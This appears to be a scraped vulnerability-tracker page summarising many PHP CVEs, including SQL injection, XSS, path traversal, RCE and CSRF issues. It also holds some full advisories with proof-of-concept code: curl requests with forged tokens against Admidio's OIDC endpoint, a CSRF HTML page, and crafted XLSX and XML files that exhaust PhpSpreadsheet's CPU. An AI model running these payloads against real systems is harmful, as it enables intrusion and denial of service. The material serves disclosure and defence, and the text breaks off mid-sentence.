PHP Path Traversal
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7130 MEDIUM This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /ajax.php?action=delete_category, enabling arbitrary SQL query execution with confidentiality and integrity impact. CVSS 6.9 reflects network accessibility and low privilege requirements; publicly available exploit code exists per description.

PHP SQLi
NVD GitHub VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7129 LOW Monitor

Reflected cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote attackers to inject malicious scripts via the ID parameter in /index.php?page=categories. The vulnerability requires user interaction (clicking a crafted link) but has publicly available exploit code and a low CVSS score (5.3) reflecting limited impact scope, with only low integrity consequences to the victim's session or data.

PHP XSS
NVD GitHub VulDB
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7128 MEDIUM This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /ajax.php?action=save_type, enabling arbitrary SQL query execution with confidentiality and integrity impact. Publicly disclosed exploit code is available, significantly increasing real-world risk despite the moderate CVSS score of 6.9.

PHP SQLi
NVD GitHub VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7131 MEDIUM POC This Month

A vulnerability has been found in code-projects Online Lot Reservation System up to 1.0. The impacted element is an unknown function of the file /loginuser.php. The manipulation of the argument email/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7127 MEDIUM POC This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to read, modify, or delete database records via the ID parameter in /ajax.php?action=delete_receiving. Publicly available exploit code (GitHub POC) demonstrates working attack against default installations with no authentication required (CVSS AV:N/AC:L/PR:N). EPSS data not available, but POC publication significantly lowers exploitation barrier for opportunistic attacks against internet-exposed instances.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7126 MEDIUM POC This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in /ajax.php?action=save_category. Public exploit code exists on GitHub (y1shiny1shin/vuldb-project), enabling immediate weaponization against unpatched systems. CVSS 7.3 reflects potential for confidentiality, integrity, and availability compromise through database manipulation. No remediation release identified at time of analysis.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7118 LOW POC Monitor

SQL injection in code-projects Employee Management System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the id or token parameter in 370project/cancel.php, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has a publicly available proof-of-concept and CVSS score of 6.3 (medium severity) with low attack complexity, though exploitation requires valid user credentials.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
EPSS 0% CVSS 2.0
LOW POC PATCH Monitor

Stored cross-site scripting (XSS) in LinkStack up to version 4.8.6 allows authenticated users to inject malicious scripts via the pageDescription parameter in the editPage function, which are then stored and executed in the browsers of users viewing the affected page. The vulnerability requires user interaction (victim must view the page) and authenticated access, limiting its scope to authenticated attackers, but publicly available exploit code exists and the vendor has provided a fix via pull request #974.

PHP XSS
NVD VulDB GitHub
EPSS 0% CVSS 9.3
CRITICAL POC PATCH Act Now

Weaver (Fanwei) E-office versions prior to 10.0_20221201 contain an unauthenticated arbitrary file upload vulnerability in the OfficeServer.php endpoint that allows remote attackers to upload. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

PHP RCE Microsoft +1
NVD
EPSS 0% CVSS 9.3
CRITICAL POC Act Now

Remote code execution in Synway SMG Gateway Management Software allows unauthenticated attackers to execute arbitrary OS commands via command injection in the RADIUS configuration endpoint. The vulnerability exploits unsanitized POST parameters (radius_address, radius_address2, shared_secret2, source_ip, timeout, retry) that are directly interpolated into sed commands at /en/9-2radius.php. Shadowserver Foundation confirmed active exploitation beginning July 11, 2025, with publicly available exploit code and Nuclei templates enabling widespread automated attacks. CVSS 9.3 critical severity reflects the combination of network accessibility, zero authentication requirements, and complete system compromise potential.

Command Injection RCE PHP
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

Five Star Restaurant Reservations plugin for WordPress versions up to 2.7.16 allows unauthenticated attackers to bypass payment verification through PHP type juggling in the valid_payment() function. The vulnerability exists in the rtb_stripe_pmt_succeed AJAX handler, which uses loose comparison (==) between attacker-supplied payment_id and the booking's stripe_payment_intent_id. When the intent ID is null (before Stripe intent creation), an empty payment_id parameter passes validation, enabling attackers to mark payment-pending bookings as paid without completing actual Stripe payments. This permits unauthorized order fulfillment and revenue loss for affected WordPress sites.

WordPress Authentication Bypass PHP
NVD
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pet Grooming Management Software 1.0 allows authenticated remote attackers to manipulate the type, length, or business parameters in /admin/update_customer.php, enabling unauthorized database queries with limited confidentiality and integrity impact. The vulnerability requires login credentials (PR:L) but carries low overall severity (CVSS 2.1); however, publicly available exploit code exists and the attack vector is network-accessible, making it a practical risk for multi-tenant or shared hosting deployments.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-site scripting (XSS) in RafyMrX TOKO-ONLINE-ROTI v.1.0 allows remote attackers to execute arbitrary JavaScript in a victim's browser via the detail_produk.php component when a user visits a malicious link. The vulnerability requires user interaction (clicking a link) and affects confidentiality and integrity with a CVSS score of 6.1. No active exploitation has been confirmed in CISA KEV, but a proof-of-concept payload exists in public repositories.

RCE PHP XSS +1
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-site scripting (XSS) vulnerability in andrewtch88 mvc-ecommerce v.1.0 allows remote attackers to execute arbitrary JavaScript in victim browsers and exfiltrate sensitive information through the product_catalogue.php component. The vulnerability requires user interaction (clicking a malicious link or visiting a compromised page) but affects all users due to stored or reflected XSS impact across site sessions. CVSS 6.1 reflects moderate risk with network-based attack vector and low complexity, though no active exploitation in CISA KEV has been confirmed at time of analysis.

RCE PHP XSS +1
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

## Summary The OIDC token introspection endpoint (`/modules/sso/index.php/oidc/introspect`) always returns `{"active": true}` for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (`/oidc/revoke`) returns `{"revoked": true}` without actually revoking any token, preventing resource servers from invalidating compromised credentials. ## Details The vulnerability is in `src/SSO/Service/OIDCService.php`, lines 604-619: ```php public function handleIntrospectionRequest() { // TODO_RK if (!$this->isServiceSetup) { $this->setupService(); } return new JsonResponse(["active" => true]); } public function handleRevocationRequest() { // TODO_RK if (!$this->isServiceSetup) { $this->setupService(); } return new JsonResponse(["revoked" => true]); } ``` The introspection endpoint is routed at `modules/sso/index.php`, line 58-59: ```php } elseif (strpos($requestUri, '/oidc/introspect') !== false) { $response = $oidcService->handleIntrospectionRequest(); ``` The router comment at line 35 says "Login checks will be done in the individual endpoint handler functions!" but neither `handleIntrospectionRequest` nor `handleRevocationRequest` perform any authentication or authorization checks. Per RFC 7662 (OAuth 2.0 Token Introspection), the introspection endpoint: 1. MUST authenticate the calling resource server (Section 2.1) 2. MUST validate the submitted token against its database 3. MUST return `{"active": false}` for invalid, expired, or revoked tokens The current implementation violates all three requirements. **Attack flow:** 1. Attacker obtains a resource server's endpoint URL that uses Admidio as its OIDC provider 2. Attacker crafts any arbitrary string as a Bearer token 3. Resource server sends the fabricated token to `/oidc/introspect` for validation 4. Admidio returns `{"active": true}` without any checks 5. Resource server accepts the fabricated token as valid and grants access **The revocation bypass compounds this:** If a legitimate token is stolen, the resource server or client application cannot revoke it. Calling `/oidc/revoke` returns success without actually revoking the token in the database, so the stolen token remains usable indefinitely (until its expiry time). ## PoC ```bash # Step 1: Confirm the introspection endpoint exists and always returns active # No valid token needed - any string works curl -X POST https://TARGET/modules/sso/index.php/oidc/introspect \ -d "token=COMPLETELY_FABRICATED_TOKEN_12345" # Expected response: {"active":true} # Step 2: Try with an empty token curl -X POST https://TARGET/modules/sso/index.php/oidc/introspect \ -d "token=" # Expected response: {"active":true} # Step 3: Demonstrate that revocation is also broken curl -X POST https://TARGET/modules/sso/index.php/oidc/revoke \ -d "token=any_valid_token_here" # Expected response: {"revoked":true} # But the token is NOT actually revoked in the database # Step 4: Verify the token is still active after "revocation" curl -X POST https://TARGET/modules/sso/index.php/oidc/introspect \ -d "token=any_valid_token_here" # Still returns: {"active":true} ``` ## Impact - **Authentication Bypass on Resource Servers**: Any application (wiki, CMS, project management tool, etc.) configured to validate tokens against this Admidio OIDC introspection endpoint will accept completely fabricated tokens. An attacker can impersonate any user on all connected resource servers. - **Inability to Revoke Compromised Tokens**: If a legitimate access token is leaked or stolen, there is no way to revoke it through the standard OIDC revocation flow. The token remains valid until its 1-hour expiry. - **Scope Change (S:C)**: The vulnerability in the Admidio authorization server directly impacts the security of all connected resource servers (different security authority), which is why the CVSS scope is Changed. ## Recommended Fix Replace the stub implementations with proper token introspection and revocation logic: ```php public function handleIntrospectionRequest() { if (!$this->isServiceSetup) { $this->setupService(); } $request = $this->getRequest(); // 1. Authenticate the resource server (RFC 7662 Section 2.1) // The resource server MUST authenticate using client credentials $clientId = $request->getParsedBody()['client_id'] ?? null; $clientSecret = $request->getParsedBody()['client_secret'] ?? null; if (!$clientId || !$this->clientRepository->validateClient($clientId, $clientSecret, null)) { return new JsonResponse(['error' => 'invalid_client'], 401); } // 2. Get and validate the token $tokenValue = $request->getParsedBody()['token'] ?? ''; if (empty($tokenValue)) { return new JsonResponse(['active' => false]); } try { // Validate the token using the resource server $validatedRequest = $this->resourceServer->validateAuthenticatedRequest( $request->withHeader('Authorization', 'Bearer ' . $tokenValue) ); $tokenId = $validatedRequest->getAttribute('oauth_access_token_id'); // Check if token is revoked if ($this->accessTokenRepository->isAccessTokenRevoked($tokenId)) { return new JsonResponse(['active' => false]); } $token = $this->accessTokenRepository->getToken($tokenId); // Check expiry if ($token->getExpiryDateTime() < new \DateTimeImmutable()) { return new JsonResponse(['active' => false]); } return new JsonResponse([ 'active' => true, 'sub' => $token->getUserIdentifier(), 'client_id' => $token->getClient()->getIdentifier(), 'exp' => $token->getExpiryDateTime()->getTimestamp(), 'scope' => implode(' ', array_map(fn($s) => $s->getIdentifier(), $token->getScopes())), ]); } catch (\Exception $e) { return new JsonResponse(['active' => false]); } } public function handleRevocationRequest() { if (!$this->isServiceSetup) { $this->setupService(); } $request = $this->getRequest(); // Authenticate the client $clientId = $request->getParsedBody()['client_id'] ?? null; $clientSecret = $request->getParsedBody()['client_secret'] ?? null; if (!$clientId || !$this->clientRepository->validateClient($clientId, $clientSecret, null)) { return new JsonResponse(['error' => 'invalid_client'], 401); } $tokenValue = $request->getParsedBody()['token'] ?? ''; if (!empty($tokenValue)) { try { $validatedRequest = $this->resourceServer->validateAuthenticatedRequest( $request->withHeader('Authorization', 'Bearer ' . $tokenValue) ); $tokenId = $validatedRequest->getAttribute('oauth_access_token_id'); $this->accessTokenRepository->revokeAccessToken($tokenId); } catch (\Exception $e) { // RFC 7009: The server responds with HTTP 200 even for invalid tokens } } return new JsonResponse([], 200); } ```

Authentication Bypass PHP
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

SAML response redirection in Admidio 5.0.8 and earlier allows attackers to steal signed authentication assertions containing user credentials and profile data by exploiting missing validation of the AssertionConsumerServiceURL in SAML AuthnRequests. The Identity Provider (IdP) accepts attacker-controlled destination URLs from SAML requests without verifying them against registered Service Provider endpoints, enabling assertion theft and account impersonation across federated applications. No public exploit code identified at time of analysis, though proof-of-concept demonstration is included in the GitHub security advisory GHSA-p9w9-87c8-m235. EPSS data not available for this CVE.

PHP Information Disclosure
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

SAML signature validation in Admidio's Identity Provider implementation can be completely bypassed due to discarded return values in authentication flows. The validateSignature() method returns error strings on failure but both call sites (SSO and Single Logout handlers) discard the return value, allowing unsigned or invalidly-signed SAML requests to proceed. Attackers can forge AuthnRequests to exfiltrate logged-in users' personal data (username, email, real name, role memberships) to attacker-controlled endpoints, or forge LogoutRequests to terminate victim sessions and cascade logout across federated Service Providers. The smc_require_auth_signed configuration setting provides no protection. Public exploit code exists (PoC in GitHub advisory). CVSS 8.2 reflects network-accessible attack with no authentication required, though practical exploitation of the SSO path requires victim to have an active session. No active exploitation confirmed at time of analysis.

PHP CSRF Jwt Attack +1
NVD GitHub
EPSS 0% CVSS 3.5
LOW PATCH Monitor

## Summary Several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because `SameSite=Lax` cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. ## Details In `modules/preferences.php`, the `backup`, `test_email`, and `htaccess` modes accept GET parameters with no CSRF token check: ```php // modules/preferences.php - backup mode case 'backup': // Creates full database dump and serves as download // No CSRF token validation $backupFile = $gDb->backup(); // ... sends file to client break; case 'test_email': // Sends test email from the server // No CSRF token validation break; case 'htaccess': // Writes .htaccess file to disk // No CSRF token validation break; ``` The `save` mode in the same file validates CSRF via `getFormObject()`, confirming the developers intended CSRF protection but did not apply it to these other modes. Because these are GET requests, `SameSite=Lax` browsers include session cookies on top-level cross-origin navigations, making CSRF exploitation trivial. ## Proof of Concept Simplified attacker page (`csrf.html` hosted on attacker origin): ```html <html> <body> <h1>Loading...</h1> <!-- Trigger backup creation on victim's browser --> <script>window.location = 'https://target-admidio.example.com/adm_program/modules/preferences.php?mode=backup';</script> </body> </html> ``` When an administrator visits this page, the browser navigates to the Admidio backup URL with full session cookies. The server generates a database dump and serves it as a download to the victim's browser. Note: the backup downloads to the victim's machine, not to the attacker. The attacker cannot read the response cross-origin. For `htaccess` mode, the CSRF overwrites the `.htaccess` file on the server, disrupting the application. For `test_email` mode, it triggers email sends from the server, which an attacker can abuse for spam or to probe internal email infrastructure. ## Impact An attacker tricks an Admidio administrator into visiting a malicious page that triggers state-changing operations on the server: - **Backup creation**: forces the server to generate a full database dump. The backup downloads to the victim's browser, not to the attacker. However, repeated backup triggers can cause disk I/O and storage pressure on the server. - **htaccess modification**: overwrites the server's `.htaccess` file, breaking URL routing or disabling security headers. - **Test email**: fires email sends from the server, usable as a spam relay or to probe internal mail configuration. The core issue is that state-changing operations run via unprotected GET requests. The victim only needs to visit a single attacker-controlled page while logged in. ## Recommended Fix 1. Change `backup`, `test_email`, and `htaccess` operations to require POST requests. 2. Add CSRF token validation using the existing `getFormObject()` mechanism. 3. As defense in depth, set `SameSite=Strict` on session cookies or add a confirmation step for destructive operations like database backup. --- *Found by [aisafe.io](https://aisafe.io)*

PHP CSRF
NVD GitHub
EPSS 0% CVSS 5.2
MEDIUM PATCH This Month

Admidio 5.0.8 and earlier allows authenticated administrators to remove all other administrators from the system via Role::stopMembership(), which lacks a minimum-administrator-count validation check. Two colluding or compromised admin accounts can sequentially remove each other, leaving zero administrators and locking administrative access. The vulnerability requires high privileges (PR:H) and user interaction (UI:R) but results in complete denial of administrative access once exploited.

PHP Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Reflected cross-site scripting (XSS) in Admidio's msg_window.php endpoint allows unauthenticated attackers to execute arbitrary JavaScript in any user's browser by exploiting incomplete output encoding. The vulnerability chains htmlspecialchars() (which does not encode square brackets) with a subsequent Language::prepareTextPlaceholders() call that converts brackets to angle brackets, producing executable HTML markup. Publicly available proof-of-concept demonstrates the attack requires only victim click (no authentication), and Admidio sets no Content-Security-Policy headers to block inline script execution.

PHP XSS
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Inverted authorization logic in Admidio's two-factor authentication reset module allows non-admin users with profile edit permissions to strip TOTP protection from administrator accounts while paradoxically blocking users from resetting their own 2FA. A group leader holding 'hasRightEditProfile()' rights on an admin account can send a single POST request to /adm_program/modules/profile/two_factor_authentication.php with the admin's UUID, disabling the admin's 2FA and reducing account security to password-only. This vulnerability affects Admidio versions ≤5.0.8; patched version 5.0.9 corrects the inverted comparison operator. Public exploit code exists via the GitHub advisory's proof-of-concept. No confirmed active exploitation (not in CISA KEV).

Authentication Bypass PHP
NVD GitHub
EPSS 0% CVSS 2.7
LOW PATCH Monitor

Admidio members_assignment_data.php endpoint leaks hidden profile field values through a blind search oracle attack. Role leaders with ROLE_LEADER_MEMBERS_ASSIGN permissions can infer exact values of hidden PII fields (birthdays, street addresses, cities, postal codes, countries) by observing which users appear in search results, despite these fields being suppressed from JSON output. The vulnerability affects Admidio versions up to 5.0.8 and is fixed in 5.0.9.

PHP Oracle Information Disclosure
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Admidio inventory module allows any authenticated user to permanently delete inventory items and modify associated data by bypassing authorization checks present only in the UI layer. The backend handlers for item_delete, item_retire, item_reinstate, and picture operations validate CSRF tokens but never verify the requesting user is an inventory administrator, enabling destructive operations on any item visible to the user. This affects Admidio versions through 5.0.8, and no active exploitation has been reported at the time of analysis.

Authentication Bypass PHP CSRF
NVD GitHub
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Admidio 5.0.8 and earlier allows user managers with rol_edit_user permission to bypass multi-tenant organization isolation and retrieve complete member directories across all organizations by directly calling the contacts_data.php endpoint with mem_show_filter=3, exploiting a permission check mismatch between the frontend UI (which correctly requires isAdministrator() and contacts_show_all setting) and the backend API endpoint (which only requires the weaker isAdministratorUsers() check). Affected data includes full names, email addresses, login names, UUIDs, and all configured profile fields from unauthorized organizations. This is confirmed actively exploited vulnerability with patch available in version 5.0.9.

Authentication Bypass PHP
NVD GitHub
EPSS 0% CVSS 4.5
MEDIUM PATCH This Month

Path traversal in Admidio's document add mode allows authenticated attackers to register arbitrary server files into document folders via unvalidated `name` parameter, enabling arbitrary file read when combined with CSRF. A low-privileged user can trick a documents administrator into clicking a malicious link to register sensitive files like `install/config.php` (containing database credentials) into a publicly accessible documents folder, then download those files using the attacker's own session. The vulnerability chains insufficient input validation (accepts `../` sequences), missing CSRF protection on the `add` action, and `SameSite=Lax` cookies that permit cross-site GET requests from administrators.

PHP CSRF Path Traversal
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Path traversal in Admidio ecard_preview.php allows authenticated users to read arbitrary server files including database credentials by bypassing filename validation on the ecard_template POST parameter. An authenticated attacker can supply path traversal payloads such as ../config.php to read adm_my_files/config.php containing unencrypted database host, username, and password, or traverse further to access system files. Exploitation requires only a regular member account with no special privileges, making this a high-impact vulnerability accessible to any registered user.

PHP Path Traversal
NVD GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the pid parameter in /admin/ajax.php?action=add_to_cart, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has publicly available exploit code and may be actively exploited.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers with high privileges to manipulate the save_user function in /admin/ajax.php via crafted input, enabling data exfiltration and modification. The vulnerability requires administrative credentials, has publicly available exploit code, and poses moderate risk (CVSS 4.7) primarily to systems where admin accounts are compromised or weak.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.7
MEDIUM PATCH This Month

Roadiz OpenID Connect authentication fails to store and validate the nonce parameter, allowing attackers to replay valid ID tokens or inject tokens from compromised identity providers to impersonate users. The package generates a nonce during authorization request initiation but never validates the returned nonce claim in the ID token, violating OIDC Core 1.0 specification requirements. Publicly available proof-of-concept demonstrates token replay within the token's validity window, affecting all Roadiz applications using the roadiz/openid package versions before 2.7.18, 2.6.31, 2.5.45, or 2.3.43.

PHP CSRF
NVD GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege attackers to manipulate the save_menu function via the /admin/ajax.php endpoint, enabling database queries with limited confidentiality and integrity impact. The vulnerability requires administrative credentials and carries a moderate CVSS score of 4.7; publicly available exploit code exists but active exploitation at scale has not been confirmed.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Authenticated users with theme upload permission in CI4MS (CodeIgniter 4 CMS/ERP) versions 0.26.0.0 through 0.31.6.0 can achieve remote code execution by uploading a malicious ZIP archive containing PHP files. The theme installation routine writes arbitrary files-including executable PHP-directly into the web-accessible public/templates/ directory without extension filtering or content validation, enabling direct HTTP access to webshells. A proof-of-concept exploit is publicly available via the GitHub security advisory (GHSA-fw49-9xq4-gmx6), and the vendor has released a patched version 0.31.7.0 implementing strict file extension allowlists for the public directory.

PHP RCE File Upload
NVD GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege users to manipulate the save_settings function via the /pizzafy/admin/ajax.php endpoint, enabling database query modification with confidentiality, integrity, and availability impact. The vulnerability requires high-level authentication and is not remotely exploitable by unauthenticated attackers despite network-accessible endpoint; publicly available exploit code exists and the vulnerability has been disclosed.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

## Summary The XLSX reader's `ColumnAndRowAttributes::readRowAttributes()` method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a minimal XLSX file (~1.6KB) containing a `<row r="999999999"/>` element that inflates `cachedHighestRow` to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources. ## Details In `src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php` at line 216, the row index is cast directly from XML without bounds checking: ```php // ColumnAndRowAttributes.php:216 $rowIndex = (int) $row['r']; // No validation against AddressRange::MAX_ROW ``` This value flows through `setRowAttributes()` (line 126) → `$this->worksheet->getRowDimension($rowNumber)` (line 60), which updates the cached highest row in `Worksheet.php:1348`: ```php // Worksheet.php:1342-1349 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` The inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in `RowIterator::resetEnd()` (RowIterator.php:86): ```php // RowIterator.php:86 $this->endRow = $endRow ?: $this->subject->getHighestRow(); ``` Notably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks. ## PoC **Step 1: Create the malicious XLSX file (~1.6KB)** ```python import zipfile import io content_types = '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>' rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>' workbook = '<?xml version="1.0" encoding="UTF-8"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>' wb_rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>' sheet = '<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData><row r="1"><c r="A1"><v>1</v></c></row><row r="999999999" ht="15"/></sheetData></worksheet>' with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf: zf.writestr('[Content_Types].xml', content_types) zf.writestr('_rels/.rels', rels) zf.writestr('xl/workbook.xml', workbook) zf.writestr('xl/_rels/workbook.xml.rels', wb_rels) zf.writestr('xl/worksheets/sheet1.xml', sheet) print("Created dos_row.xlsx") ``` **Step 2: Load with PhpSpreadsheet (CPU exhaustion)** ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xlsx'); $spreadsheet = $reader->load('dos_row.xlsx'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Output: Highest row: 999999999 // This will consume CPU for ~144 seconds (999M iterations) foreach ($sheet->getRowIterator() as $row) { // CPU exhaustion } ``` **Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely. ## Impact - **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. Estimated CPU burn is ~144 seconds per file. - **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory. - **Amplification:** The ratio of input size to resource consumption is extreme - 1,580 bytes triggers nearly 1 billion iterations. - **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely. ## Recommended Fix Add row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161: ```php // src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216 // Before: $rowIndex = (int) $row['r']; // After: $rowIndex = (int) $row['r']; if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) { continue; } ``` The `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 161.

PHP Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

## Summary The SpreadsheetML XML reader (`Reader\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index="999999999"` on a `<Row>` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. ## Details In `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `<Row>` elements: ```php // Xml.php:397-402 if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW } if (isset($row_ss['Hidden'])) { $rowVisible = ((string) $row_ss['Hidden']) !== '1'; $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible); } ``` The `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`: ```php // Worksheet.php:1342-1351 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` This inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`. The `RowIterator` constructor uses `getHighestRow()` as its default end row: ```php // RowIterator.php:84-88 public function resetEnd(?int $endRow = null): static { $this->endRow = $endRow ?: $this->subject->getHighestRow(); return $this; } ``` With `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection - it returns `true` for all cells. Even without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability. ## PoC 1. Create `poc.xml`: ```xml <?xml version="1.0"?> <?mso-application progid="Excel.Sheet"?> <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"> <Worksheet ss:Name="Sheet1"> <Table> <Row ss:Index="999999999" ss:Hidden="1"/> <Row><Cell><Data ss:Type="String">test</Data></Cell></Row> </Table> </Worksheet> </Workbook> ``` 2. Load and iterate: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xml'); $spreadsheet = $reader->load('poc.xml'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Outputs: Highest row: 1000000000 // This loop will attempt ~1 billion iterations → CPU exhaustion foreach ($sheet->getRowIterator() as $row) { // Never completes } ``` ## Impact Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by: - Exhausting server CPU with a single small XML file (~300 bytes) - Blocking the PHP worker process, potentially affecting all concurrent users - Triggering PHP max_execution_time limits that still consume 